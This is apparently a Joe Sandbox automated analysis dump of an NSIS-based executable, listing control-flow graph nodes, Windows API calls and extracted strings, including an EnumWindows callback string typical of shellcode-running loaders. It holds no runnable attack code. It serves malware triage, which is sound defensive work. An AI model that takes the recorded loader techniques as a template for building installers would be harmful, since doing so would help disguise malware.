EnableMenuItem SendMessageW 5779 404443 SendMessageW 5778->5779 5778->5782 5779->5782 5781 4040e3 22 API calls 5781->5782 5782->5778 5782->5781 5798 404636 SendMessageW 5782->5798 5799 406682 lstrcpynW 5782->5799 5784 404472 lstrlenW 5785 4066bf 21 API calls 5784->5785 5786 404488 SetWindowTextW 5785->5786 5787 401389 2 API calls 5786->5787 5787->5767 5788->5748 5789 4044e6 CreateDialogParamW 5788->5789 5789->5748 5790 404519 5789->5790 5791 404601 22 API calls 5790->5791 5792 404524 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5791->5792 5793 401389 2 API calls 5792->5793 5794 40456a 5793->5794 5794->5746 5795 404572 ShowWindow 5794->5795 5796 40464d SendMessageW 5795->5796 5796->5748 5797->5777 5798->5782 5799->5784 5800 401503 5801 401508 5800->5801 5803 401520 5800->5803 5802 402d89 21 API calls 5801->5802 5802->5803 5804 402983 5826 406172 GetFileAttributesW CreateFileW 5804->5826 5806 40298a 5807 402a40 5806->5807 5810 4029a5 GlobalAlloc 5806->5810 5811 402a28 5806->5811 5808 402a47 DeleteFileW 5807->5808 5809 402a5a 5807->5809 5808->5809 5810->5811 5812 4029be 5810->5812 5813 403376 48 API calls 5811->5813 5827 4035fd SetFilePointer 5812->5827 5815 402a35 CloseHandle 5813->5815 5815->5807 5816 4029c4 5817 4035e7 ReadFile 5816->5817 5818 4029cd GlobalAlloc 5817->5818 5819 402a11 5818->5819 5820 4029dd 5818->5820 5822 406224 WriteFile 5819->5822 5821 403376 48 API calls 5820->5821 5825 4029ea 5821->5825 5823 402a1d GlobalFree 5822->5823 5823->5811 5824 402a08 GlobalFree 5824->5819 5825->5824 5826->5806 5827->5816 5828 401a04 5829 402dab 21 API calls 5828->5829 5830 401a0b 5829->5830 5831 402dab 21 API calls 5830->5831 5832 401a14 5831->5832 5833 401a1b lstrcmpiW 5832->5833 5834 401a2d lstrcmpW 5832->5834 5835 401a21 5833->5835 5834->5835 5836 402304 5837 402dab 21 API calls 5836->5837 5838 40230a 5837->5838 5839 402dab 21 API calls 5838->5839 5840 402313 5839->5840 5841 402dab 21 API calls 5840->5841 5842 40231c 5841->5842 5843 4069df 2 API calls 5842->5843 5844 402325 5843->5844 5845 402336 lstrlenW lstrlenW 5844->5845 5846 402329 5844->5846 5848 405707 28 API calls 5845->5848 5847 405707 28 API calls 5846->5847 5850 402331 5846->5850 5847->5850 5849 402374 SHFileOperationW 5848->5849 5849->5846 5849->5850 5851 702510e1 5861 70251111 5851->5861 5852 702512b0 GlobalFree 5853 70251240 GlobalFree 5853->5861 5854 702511d7 GlobalAlloc 5854->5861 5855 702512ab 5855->5852 5856 7025135a 2 API calls 5856->5861 5857 70251312 2 API calls 5857->5861 5858 7025129a GlobalFree 5858->5861 5859 70251381 lstrcpyW 5859->5861 5860 7025116b GlobalAlloc 5860->5861 5861->5852 5861->5853 5861->5854 5861->5855 5861->5856 5861->5857 5861->5858 5861->5859 5861->5860 5869 401d86 5870 401d99 GetDlgItem 5869->5870 5871 401d8c 5869->5871 5873 401d93 5870->5873 5872 402d89 21 API calls 5871->5872 5872->5873 5874 401dda GetClientRect LoadImageW SendMessageW 5873->5874 5875 402dab 21 API calls 5873->5875 5877 401e38 5874->5877 5879 401e44 5874->5879 5875->5874 5878 401e3d DeleteObject 5877->5878 5877->5879 5878->5879 5880 402388 5881 40238f 5880->5881 5884 4023a2 5880->5884 5882 4066bf 21 API calls 5881->5882 5883 40239c 5882->5883 5883->5884 5885 405ce2 MessageBoxIndirectW 5883->5885 5885->5884 4841 401389 4842 401390 4841->4842 4843 4013fe 4842->4843 4844 4013cb MulDiv SendMessageW 4842->4844 4844->4842 5886 402c0a SendMessageW 5887 402c24 InvalidateRect 5886->5887 5888 402c2f 5886->5888 5887->5888 5889 702523e9 5890 70252453 5889->5890 5891 7025245e GlobalAlloc 5890->5891 5892 7025247d 5890->5892 5891->5890 4866 40248f 4867 402dab 21 API calls 4866->4867 4868 4024a1 4867->4868 4869 402dab 21 API calls 4868->4869 4870 4024ab 4869->4870 4883 402e3b 4870->4883 4873 402c2f 4874 4024e3 4877 402d89 21 API calls 4874->4877 4879 4024ef 4874->4879 4875 402dab 21 API calls 4876 4024d9 lstrlenW 4875->4876 4876->4874 4877->4879 4878 40250e RegSetValueExW 4881 402524 RegCloseKey 4878->4881 4879->4878 4880 403376 48 API calls 4879->4880 4880->4878 4881->4873 4884 402e56 4883->4884 4887 40651d 4884->4887 4888 40652c 4887->4888 4889 4024bb 4888->4889 4890 406537 RegCreateKeyExW 4888->4890 4889->4873 4889->4874 4889->4875 4890->4889 5893 402910 5894 402dab 21 API calls 5893->5894 5895 402917 FindFirstFileW 5894->5895 5896 40293f 5895->5896 5900 40292a 5895->5900 5897 402948 5896->5897 5901 4065c9 wsprintfW 5896->5901 5902 406682 lstrcpynW 5897->5902 5901->5897 5902->5900 5903 70251774 5904 702517a3 5903->5904 5905 70251bff 22 API calls 5904->5905 5906 702517aa 5905->5906 5907 702517b1 5906->5907 5908 702517bd 5906->5908 5909 70251312 2 API calls 5907->5909 5910 702517e4 5908->5910 5911 702517c7 5908->5911 5914 702517bb 5909->5914 5912 7025180e 5910->5912 5913 702517ea 5910->5913 5915 702515dd 3 API calls 5911->5915 5917 702515dd 3 API calls 5912->5917 5916 70251654 3 API calls 5913->5916 5918 702517cc 5915->5918 5919 702517ef 5916->5919 5917->5914 5920 70251654 3 API calls 5918->5920 5921 70251312 2 API calls 5919->5921 5922 702517d2 5920->5922 5924 702517f5 GlobalFree 5921->5924 5923 70251312 2 API calls 5922->5923 5925 702517d8 GlobalFree 5923->5925 5924->5914 5926 70251809 GlobalFree 5924->5926 5925->5914 5926->5914 5927 401911 5928 401948 5927->5928 5929 402dab 21 API calls 5928->5929 5930 40194d 5929->5930 5931 405d8e 71 API calls 5930->5931 5932 401956 5931->5932 5933 401491 5934 405707 28 API calls 5933->5934 5935 401498 5934->5935 5936 403d12 5937 403d1d 5936->5937 5938 403d21 5937->5938 5939 403d24 GlobalAlloc 5937->5939 5939->5938 5947 401914 5948 402dab 21 API calls 5947->5948 5949 40191b 5948->5949 5950 405ce2 MessageBoxIndirectW 5949->5950 5951 401924 5950->5951 4957 402896 4958 40289d 4957->4958 4960 402bae 4957->4960 4959 402d89 21 API calls 4958->4959 4961 4028a4 4959->4961 4962 4028b3 SetFilePointer 4961->4962 4962->4960 4963 4028c3 4962->4963 4965 4065c9 wsprintfW 4963->4965 4965->4960 5952 401f17 5953 402dab 21 API calls 5952->5953 5954 401f1d 5953->5954 5955 402dab 21 API calls 5954->5955 5956 401f26 5955->5956 5957 402dab 21 API calls 5956->5957 5958 401f2f 5957->5958 5959 402dab 21 API calls 5958->5959 5960 401f38 5959->5960 5961 401423 28 API calls 5960->5961 5962 401f3f 5961->5962 5969 405ca8 ShellExecuteExW 5962->5969 5964 401f87 5965 406b21 5 API calls 5964->5965 5966 402933 5964->5966 5967 401fa4 CloseHandle 5965->5967 5967->5966 5969->5964 5970 402f98 5971 402fc3 5970->5971 5972 402faa SetTimer 5970->5972 5973 403011 5971->5973 5974 403017 MulDiv 5971->5974 5972->5971 5975 402fd1 wsprintfW SetWindowTextW SetDlgItemTextW 5974->5975 5975->5973 5014 70252a7f 5015 70252acf 5014->5015 5016 70252a8f VirtualProtect 5014->5016 5016->5015 5977 70251979 5978 7025199c 5977->5978 5979 702519d1 GlobalFree 5978->5979 5980 702519e3 5978->5980 5979->5980 5981 70251312 2 API calls 5980->5981 5982 70251b6e GlobalFree GlobalFree 5981->5982 5983 401d1c 5984 402d89 21 API calls 5983->5984 5985 401d22 IsWindow 5984->5985 5986 401a25 5985->5986 5987 40149e 5988 4023a2 5987->5988 5989 4014ac PostQuitMessage 5987->5989 5989->5988 4226 401ba0 4227 401bf1 4226->4227 4228 401bad 4226->4228 4230 401bf6 4227->4230 4231 401c1b GlobalAlloc 4227->4231 4229 401c36 4228->4229 4235 401bc4 4228->4235 4233 4066bf 21 API calls 4229->4233 4239 4023a2 4229->4239 4230->4239 4264 406682 lstrcpynW 4230->4264 4245 4066bf 4231->4245 4234 40239c 4233->4234 4234->4239 4265 405ce2 4234->4265 4262 406682 lstrcpynW 4235->4262 4237 401c08 GlobalFree 4237->4239 4241 401bd3 4263 406682 lstrcpynW 4241->4263 4243 401be2 4269 406682 lstrcpynW 4243->4269 4249 4066ca 4245->4249 4246 406911 4247 40692a 4246->4247 4292 406682 lstrcpynW 4246->4292 4247->4229 4249->4246 4250 4068e2 lstrlenW 4249->4250 4251 4067db GetSystemDirectoryW 4249->4251 4252 4066bf 15 API calls 4249->4252 4256 4067f1 GetWindowsDirectoryW 4249->4256 4257 406883 lstrcatW 4249->4257 4259 4066bf 15 API calls 4249->4259 4261 406853 SHGetPathFromIDListW CoTaskMemFree 4249->4261 4270 406550 4249->4270 4275 406a76 GetModuleHandleA 4249->4275 4281 406930 4249->4281 4290 4065c9 wsprintfW 4249->4290 4291 406682 lstrcpynW 4249->4291 4250->4249 4251->4249 4252->4250 4256->4249 4257->4249 4259->4249 4261->4249 4262->4241 4263->4243 4264->4237 4267 405cf7 4265->4267 4266 405d43 4266->4239 4267->4266 4268 405d0b MessageBoxIndirectW 4267->4268 4268->4266 4269->4239 4293 4064ef 4270->4293 4273 4065b4 4273->4249 4274 406584 RegQueryValueExW RegCloseKey 4274->4273 4276 406a92 4275->4276 4277 406a9c GetProcAddress 4275->4277 4297 406a06 GetSystemDirectoryW 4276->4297 4279 406aab 4277->4279 4279->4249 4280 406a98 4280->4277 4280->4279 4288 40693d 4281->4288 4282 4069b3 4283 4069b8 CharPrevW 4282->4283 4286 4069d9 4282->4286 4283->4282 4284 4069a6 CharNextW 4284->4282 4284->4288 4286->4249 4287 406992 CharNextW 4287->4288 4288->4282 4288->4284 4288->4287 4289 4069a1 CharNextW 4288->4289 4300 405f7e 4288->4300 4289->4284 4290->4249 4291->4249 4292->4247 4294 4064fe 4293->4294 4295 406502 4294->4295 4296 406507 RegOpenKeyExW 4294->4296 4295->4273 4295->4274 4296->4295 4298 406a28 wsprintfW LoadLibraryExW 4297->4298 4298->4280 4301 405f84 4300->4301 4302 405f9a 4301->4302 4303 405f8b CharNextW 4301->4303 4302->4288 4303->4301 5990 406da0 5992 406c24 5990->5992 5991 40758f 5992->5991 5993 406ca5 GlobalFree 5992->5993 5994 406cae GlobalAlloc 5992->5994 5995 406d25 GlobalAlloc 5992->5995 5996 406d1c GlobalFree 5992->5996 5993->5994 5994->5991 5994->5992 5995->5991 5995->5992 5996->5995 5997 402621 5998 402dab 21 API calls 5997->5998 5999 402628 5998->5999 6002 406172 GetFileAttributesW CreateFileW 5999->6002 6001 402634 6002->6001 4320 4025a3 4332 402deb 4320->4332 4324 4025b6 4325 4025c5 4324->4325 4330 402933 4324->4330 4326 4025d2 RegEnumKeyW 4325->4326 4327 4025de RegEnumValueW 4325->4327 4328 4025fa RegCloseKey 4326->4328 4327->4328 4329 4025f3 4327->4329 4328->4330 4329->4328 4333 402dab 21 API calls 4332->4333 4334 402e02 4333->4334 4335 4064ef RegOpenKeyExW 4334->4335 4336 4025ad 4335->4336 4337 402d89 4336->4337 4338 4066bf 21 API calls 4337->4338 4339 402d9e 4338->4339 4339->4324 6003 70252d43 6004 70252d5b 6003->6004 6005 7025162f 2 API calls 6004->6005 6006 70252d76 6005->6006 6007 4015a8 6008 402dab 21 API calls 6007->6008 6009 4015af SetFileAttributesW 6008->6009 6010 4015c1 6009->6010 4845 401fa9 4846 402dab 21 API calls 4845->4846 4847 401faf 4846->4847 4848 405707 28 API calls 4847->4848 4849 401fb9 4848->4849 4850 405c65 2 API calls 4849->4850 4851 401fbf 4850->4851 4853 402933 4851->4853 4859 401fe2 CloseHandle 4851->4859 4860 406b21 WaitForSingleObject 4851->4860 4855 401fd4 4856 401fe4 4855->4856 4857 401fd9 4855->4857 4856->4859 4865 4065c9 wsprintfW 4857->4865 4859->4853 4861 406b3b 4860->4861 4862 406b4d GetExitCodeProcess 4861->4862 4863 406ab2 2 API calls 4861->4863 4862->4855 4864 406b42 WaitForSingleObject 4863->4864 4864->4861 4865->4859 6018 404aab 6019 404ae1 6018->6019 6020 404abb 6018->6020 6022 404668 8 API calls 6019->6022 6021 404601 22 API calls 6020->6021 6024 404ac8 SetDlgItemTextW 6021->6024 6023 404aed 6022->6023 6024->6019 6025 40202f 6026 402dab 21 API calls 6025->6026 6027 402036 6026->6027 6028 406a76 5 API calls 6027->6028 6029 402045 6028->6029 6030 402061 GlobalAlloc 6029->6030 6032 4020d1 6029->6032 6031 402075 6030->6031 6030->6032 6033 406a76 5 API calls 6031->6033 6034 40207c 6033->6034 6035 406a76 5 API calls 6034->6035 6036 402086 6035->6036 6036->6032 6040 4065c9 wsprintfW 6036->6040 6038 4020bf 6041 4065c9 wsprintfW 6038->6041 6040->6038 6041->6032 6042 40252f 6043 402deb 21 API calls 6042->6043 6044 402539 6043->6044 6045 402dab 21 API calls 6044->6045 6046 402542 6045->6046 6047 40254d RegQueryValueExW 6046->6047 6049 402933 6046->6049 6048 40256d 6047->6048 6052 402573 RegCloseKey 6047->6052 6048->6052 6053 4065c9 wsprintfW 6048->6053 6052->6049 6053->6052 6054 4021af 6055 402dab 21 API calls 6054->6055 6056 4021b6 6055->6056 6057 402dab 21 API calls 6056->6057 6058 4021c0 6057->6058 6059 402dab 21 API calls 6058->6059 6060 4021ca 6059->6060 6061 402dab 21 API calls 6060->6061 6062 4021d4 6061->6062 6063 402dab 21 API calls 6062->6063 6064 4021de 6063->6064 6065 40221d CoCreateInstance 6064->6065 6066 402dab 21 API calls 6064->6066 6069 40223c 6065->6069 6066->6065 6067 401423 28 API calls 6068 4022fb 6067->6068 6069->6067 6069->6068 6070 401a35 6071 402dab 21 API calls 6070->6071 6072 401a3e ExpandEnvironmentStringsW 6071->6072 6073 401a52 6072->6073 6074 401a65 6072->6074 6073->6074 6075 401a57 lstrcmpW 6073->6075 6075->6074 4966 4023b7 4967 4023bf 4966->4967 4969 4023c5 4966->4969 4968 402dab 21 API calls 4967->4968 4968->4969 4970 402dab 21 API calls 4969->4970 4972 4023d3 4969->4972 4970->4972 4971 4023e1 4974 402dab 21 API calls 4971->4974 4972->4971 4973 402dab 21 API calls 4972->4973 4973->4971 4975 4023ea WritePrivateProfileStringW 4974->4975 6076 404737 lstrcpynW lstrlenW 6082 4014b8 6083 4014be 6082->6083 6084 401389 2 API calls 6083->6084 6085 4014c6 6084->6085 4976 402439 4977 402441 4976->4977 4978 40246c 4976->4978 4979 402deb 21 API calls 4977->4979 4980 402dab 21 API calls 4978->4980 4981 402448 4979->4981 4982 402473 4980->4982 4983 402452 4981->4983 4987 402480 4981->4987 4988 402e69 4982->4988 4985 402dab 21 API calls 4983->4985 4986 402459 RegDeleteValueW RegCloseKey 4985->4986 4986->4987 4989 402e76 4988->4989 4990 402e7d 4988->4990 4989->4987 4990->4989 4992 402eae 4990->4992 4993 4064ef RegOpenKeyExW 4992->4993 4994 402edc 4993->4994 4995 402f91 4994->4995 4996 402ee6 4994->4996 4995->4989 4997 402eec RegEnumValueW 4996->4997 4998 402f0f 4996->4998 4997->4998 4999 402f76 RegCloseKey 4997->4999 4998->4999 5000 402f4b RegEnumKeyW 4998->5000 5001 402f54 RegCloseKey 4998->5001 5003 402eae 6 API calls 4998->5003 4999->4995 5000->4998 5000->5001 5002 406a76 5 API calls 5001->5002 5004 402f64 5002->5004 5003->4998 5005 402f86 5004->5005 5006 402f68 RegDeleteKeyW 5004->5006 5005->4995 5006->4995 6086 40173a 6087 402dab 21 API calls 6086->6087 6088 401741 SearchPathW 6087->6088 6089 40175c 6088->6089 6090 70251058 6092 70251074 6090->6092 6091 702510dd 6092->6091 6093 702515b6 GlobalFree 6092->6093 6094 70251092 6092->6094 6093->6094 6095 702515b6 GlobalFree 6094->6095 6096 702510a2 6095->6096 6097 702510b2 6096->6097 6098 702510a9 GlobalSize 6096->6098 6099 702510b6 GlobalAlloc 6097->6099 6100 702510c7 6097->6100 6098->6097 6101 702515dd 3 API calls 6099->6101 6102 702510d2 GlobalFree 6100->6102 6101->6100 6102->6091 6103 401d3d 6104 402d89 21 API calls 6103->6104 6105 401d44 6104->6105 6106 402d89 21 API calls 6105->6106 6107 401d50 GetDlgItem 6106->6107 6108 40263d 6107->6108

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 0 403645-403697 SetErrorMode GetVersionExW 1 4036d1-4036d6 0->1 2 403699-4036c9 GetVersionExW 0->2 3 4036d8 1->3 4 4036de-403720 1->4 2->1 3->4 5 403722-40372a call 406a76 4->5 6 403733 4->6 5->6 11 40372c 5->11 8 403738-40374c call 406a06 lstrlenA 6->8 13 40374e-40376a call 406a76 * 3 8->13 11->6 20 40377b-4037df #17 OleInitialize SHGetFileInfoW call 406682 GetCommandLineW call 406682 13->20 21 40376c-403772 13->21 28 4037e1-4037e3 20->28 29 4037e8-4037fc call 405f7e CharNextW 20->29 21->20 25 403774 21->25 25->20 28->29 32 4038f7-4038fd 29->32 33 403801-403807 32->33 34 403903 32->34 35 403810-403817 33->35 36 403809-40380e 33->36 37 403917-403931 GetTempPathW call 403614 34->37 38 403819-40381e 35->38 39 40381f-403823 35->39 36->35 36->36 47 403933-403951 GetWindowsDirectoryW lstrcatW call 403614 37->47 48 403989-4039a3 DeleteFileW call 4030d5 37->48 38->39 41 4038e4-4038f3 call 405f7e 39->41 42 403829-40382f 39->42 41->32 59 4038f5-4038f6 41->59 45 403831-403838 42->45 46 403849-403882 42->46 52 40383a-40383d 45->52 53 40383f 45->53 54 403884-403889 46->54 55 40389f-4038d9 46->55 47->48 62 403953-403983 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403614 47->62 64 403b90-403ba0 call 403c62 OleUninitialize 48->64 65 4039a9-4039af 48->65 52->46 52->53 53->46 54->55 61 40388b-403893 54->61 57 4038e1-4038e3 55->57 58 4038db-4038df 55->58 57->41 58->57 63 403905-403912 call 406682 58->63 59->32 66 403895-403898 61->66 67 40389a 61->67 62->48 62->64 63->37 77 403ba2-403bb2 call 405ce2 ExitProcess 64->77 78 403bc6-403bcc 64->78 70 4039b5-4039c0 call 405f7e 65->70 71 403a48-403a4f call 403d54 65->71 66->55 66->67 67->55 82 4039c2-4039f7 70->82 83 403a0e-403a18 70->83 80 403a54-403a58 71->80 84 403c4a-403c52 78->84 85 403bce-403be4 GetCurrentProcess OpenProcessToken 78->85 80->64 91 4039f9-4039fd 82->91 86 403a1a-403a28 call 406059 83->86 87 403a5d-403a83 call 405c4d lstrlenW call 406682 83->87 88 403c54 84->88 89 403c58-403c5c ExitProcess 84->89 92 403be6-403c14 LookupPrivilegeValueW AdjustTokenPrivileges 85->92 93 403c1a-403c28 call 406a76 85->93 86->64 106 403a2e-403a44 call 406682 * 2 86->106 110 403a94-403aac 87->110 111 403a85-403a8f call 406682 87->111 88->89 97 403a06-403a0a 91->97 98 4039ff-403a04 91->98 92->93 104 403c36-403c41 ExitWindowsEx 93->104 105 403c2a-403c34 93->105 97->91 99 403a0c 97->99 98->97 98->99 99->83 104->84 108 403c43-403c45 call 40140b 104->108 105->104 105->108 106->71 108->84 116 403ab1-403ab5 110->116 111->110 118 403aba-403ae4 wsprintfW call 4066bf 116->118 122 403ae6-403aeb call 405bd6 118->122 123 403aed call 405c30 118->123 127 403af2-403af4 122->127 123->127 128 403b30-403b4f SetCurrentDirectoryW call 406442 CopyFileW 127->128 129 403af6-403b00 GetFileAttributesW 127->129 137 403b51-403b72 call 406442 call 4066bf call 405c65 128->137 138 403b8e 128->138 130 403b21-403b2c 129->130 131 403b02-403b0b DeleteFileW 129->131 130->116 134 403b2e 130->134 131->130 133 403b0d-403b1f call 405d8e 131->133 133->118 133->130 134->64 146 403b74-403b7e 137->146 147 403bb8-403bc4 CloseHandle 137->147 138->64 146->138 148 403b80-403b88 call 4069df 146->148 147->138 148->118 148->138
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetErrorMode.KERNELBASE ref: 00403668
                                                                                                                                                                                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403693
                                                                                                                                                                                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004036A6
                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040373F
                                                                                                                                                                                                                                    • #17.COMCTL32(?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 0040377C
                                                                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 00403783
                                                                                                                                                                                                                                    • SHGetFileInfoW.SHELL32(00420F08,00000000,?,000002B4,00000000), ref: 004037A2
                                                                                                                                                                                                                                    • GetCommandLineW.KERNEL32(00428A60,NSIS Error,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 004037B7
                                                                                                                                                                                                                                    • CharNextW.USER32(00000000,"C:\Users\user\Desktop\2T10XBqS6g.exe",?,"C:\Users\user\Desktop\2T10XBqS6g.exe",00000000,?,?,0000000A,?), ref: 004037F0
                                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00403928
                                                                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00403939
                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00403945
                                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00403959
                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00403961
                                                                                                                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00403972
                                                                                                                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 0040397A
                                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(1033,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 0040398E
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\2T10XBqS6g.exe",00000000,?,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00403A67
                                                                                                                                                                                                                                      • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,?,0000000A,?), ref: 0040668F
                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00403AC4
                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 00403AF7
                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(0042C800), ref: 00403B03
                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B31
                                                                                                                                                                                                                                      • Part of subcall function 00406442: MoveFileExW.KERNEL32(?,?,00000005,00405F40,?,00000000,000000F1,?,?,?,?,?), ref: 0040644C
                                                                                                                                                                                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\2T10XBqS6g.exe,0042C800,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403B47
                                                                                                                                                                                                                                      • Part of subcall function 00405C65: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
                                                                                                                                                                                                                                      • Part of subcall function 00405C65: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
                                                                                                                                                                                                                                      • Part of subcall function 004069DF: FindFirstFileW.KERNELBASE(75C53420,00425F98,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,004060A2,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,75C53420,?,75C52EE0,00405DAE,?,75C53420,75C52EE0), ref: 004069EA
                                                                                                                                                                                                                                      • Part of subcall function 004069DF: FindClose.KERNEL32(00000000), ref: 004069F6
                                                                                                                                                                                                                                    • OleUninitialize.OLE32(?,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00403B95
                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403BB2
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403BB9
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00403BD5
                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403BDC
                                                                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BF1
                                                                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403C14
                                                                                                                                                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C39
                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403C5C
                                                                                                                                                                                                                                      • Part of subcall function 00405C30: CreateDirectoryW.KERNELBASE(?,00000000,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,?,0000000A,?), ref: 00405C36
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\2T10XBqS6g.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\2T10XBqS6g.exe$C:\Users\user\eftermodnendes\ringeagt$C:\Users\user\eftermodnendes\ringeagt$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$user32::EnumWindows(i r1 ,i 0)$~nsu%X.tmp
                                                                                                                                                                                                                                    • API String ID: 1813718867-4264008638
                                                                                                                                                                                                                                    • Opcode ID: 0478bff6c520e1fcae09ae2a6132b709cffae3f0026663cdf2ec71cee886cdca
                                                                                                                                                                                                                                    • Instruction ID: d2a3103bd0adf94391fd0ebfa47e937d37e61a7cc597b22c14a72094b2238e17
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0478bff6c520e1fcae09ae2a6132b709cffae3f0026663cdf2ec71cee886cdca
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4CF1E531604300AAD320AF759D05B2B7EE8AB8570AF11483FF585B22D1DB7C9A41CB6E

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
